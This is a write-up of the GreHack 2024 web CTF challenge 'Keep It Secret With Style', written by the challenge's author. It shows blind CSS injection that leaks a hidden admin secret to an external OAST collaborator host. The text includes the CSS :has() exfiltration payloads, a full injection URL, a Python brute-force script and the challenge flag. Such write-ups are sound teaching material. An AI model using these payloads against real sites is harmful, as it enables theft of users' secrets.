---
title: "GreHack 2024 CTF - Keep It Secret With Style"
layout: "writeups"
date: 2024-11-16
url: "/writeups/grehack_keep_it_secret_with_style"
summary: "Writeup of the Web challenge 'Keep It Secret With Style' at the GreHack 2024 CTF."
author: "Nishacid"
tags: 
- Writeups
- GreHack
- GreHack24
- Challenge
- Web
- CSS Injection
ShowToc: true
TocOpen: true
ShowReadingTime: true
ShowBreadCrumbs: true
---

<img src="/assets/images/writeups/gh24/GH24_logocomplet.svg">

## Introduction

This year again, I was happy to be part of the organization committee for the [GreHack conference](https://grehack.fr/) and I created some challenges for the CTF. 
Organization was tricky this year, given that we had grown and sold almost 3x as many tickets as in previous years.
Thanks to all the participants, organizers and sponsors, the event was once again complety insane :fire: :green_heart:

## Challenge

- Name : `Keep It Secret With Style`
- Category : `Web`
- Difficulty : `Medium`
- Solves : `12`
- Points : `379`
- Author : `Nishacid`

> Who would ever have hoped to combine security with design? Well, if that's your dream, it can now come true! Discover this wonderful application that lets you store your secrets securely with a design that reflects your style.

> *Note, the administrator's secret matches this regex : `^GH{[a-zA-Z0-9_]{10}}$`*

- [Source Code](/assets/sources/gh24/keep_it_secret_with_style.zip)

## Solve

The challenge starts with a login page. We can register with a login, password and a secret.
When logged-in, our profile page allows us to modify the background colour of it.

<img src="/assets/images/writeups/gh24/keep_it_secret/custom.png" style="margin-left:0%;border:solid;border-color:#885FFF;">

There is a GET parameter to control the color of the background. We can try to inject JavaScript or HTML to achieve XSS, but nothing will work, only CSS. For example, we can try to inject a new `<script>` tag, but it will be blocked by the Content-Security-Policy (CSP).

<img src="/assets/images/writeups/gh24/keep_it_secret/csp.png" style="margin-left:0%;border:solid;border-color:#885FFF;">

But, we can add new CSS instruction and thus modify the style of the page.

<img src="/assets/images/writeups/gh24/keep_it_secret/inject.png" style="margin-left:0%;border:solid;border-color:#885FFF;">

> An important note here, is as our injection is it not the **first** CSS instruction, we can't use the `@import` trick.

At this point and as we know the regex of the flag (`^GH{[a-zA-Z0-9_]{10}}$`), we can try to construct a "classic" payload to exfiltrate the content of the following input:

```html
<input type="hidden" value="GH{flag}" id="secret" name="hiddenSecret">
```

With the following CSS, if the value of the input starts with `G`, the background image will be set to our OAST server. This is a classic blind CSS exfiltration.
```css
input[name=hiddenSecret][value^=G]{
        background-image:url(https://7s0ltgjcg783rbrlqize0dlj9af13rrg.oastify.com/G) !important;
}
```

But, this will not work. This is due to the fact that we can't make background requests on a `hidden` input.
To do this, we can use the `:has` pseudo-class based on the parent `section` element, which will allow us to make a background request on the element.

- https://keep-it-secret-with-style.ctf.grehack.fr/profile?color=#c061cb}section:has(input[name=hiddenSecret][value^=G]){background-image:url(https://ftctuokkhf9bsjstrq0m1lmraig940sp.oastify.com/G)

```css
section:has(input[name=hiddenSecret][value^=G]){
        background-image:url(https://7s0ltgjcg783rbrlqize0dlj9af13rrg.oastify.com/G) !important;
}
```

<img src="/assets/images/writeups/gh24/keep_it_secret/oast.png" style="margin-left:10%;border:solid;border-color:#885FFF;">

Now that we have a way to exfiltrate the content of the input, we can try to get the flag manually, or write a script to do it for us (*I'll let you upgrade this dirty script*).

```python
import requests
import string
import itertools

characters = string.ascii_letters + string.digits + "_" + "{}"

base_url = "https://keep-it-secret-with-style.ctf.grehack.fr/profile"
report_url = "https://keep-it-secret-with-style.ctf.grehack.fr/report"
domain = "7s0ltgjcg783rbrlqize0dlj9af13rrg.oastify.com"

def send_request(char_sequence):
    payload = f"{base_url}?color=%23c061cb}}section:has(input[name=hiddenSecret][value^={char_sequence}]){{background-image:url(https://{domain}/{char_sequence})"
    print(payload)
    
    data = {"url": payload}
    r = requests.post(url=report_url, data=data)

for length in range(1, 15):
    for combo in itertools.product(characters, repeat=length):
        char_sequence = ''.join(combo)
        send_request(char_sequence)
```

After a few minutes, we can construct the following payload : 

```css
section:has(input[name=hiddenSecret][value="GH{w1tH_StYl3}"]){
    background-image:url("https://7s0ltgjcg783rbrlqize0dlj9af13rrg.oastify.com/GH{w1tH_StYl3}")
}
```

- Flag : `GH{w1tH_StYl3}`

## Resources 
- https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
- https://portswigger.net/research/blind-css-exfiltration
- https://www.youtube.com/watch?v=3WjDnnmLlKo
- https://github.com/hackvertor/blind-css-exfiltration

<img src="/assets/images/writeups/gh24/GH24_mascotte.svg" style="width:40%;margin-left:25%;">
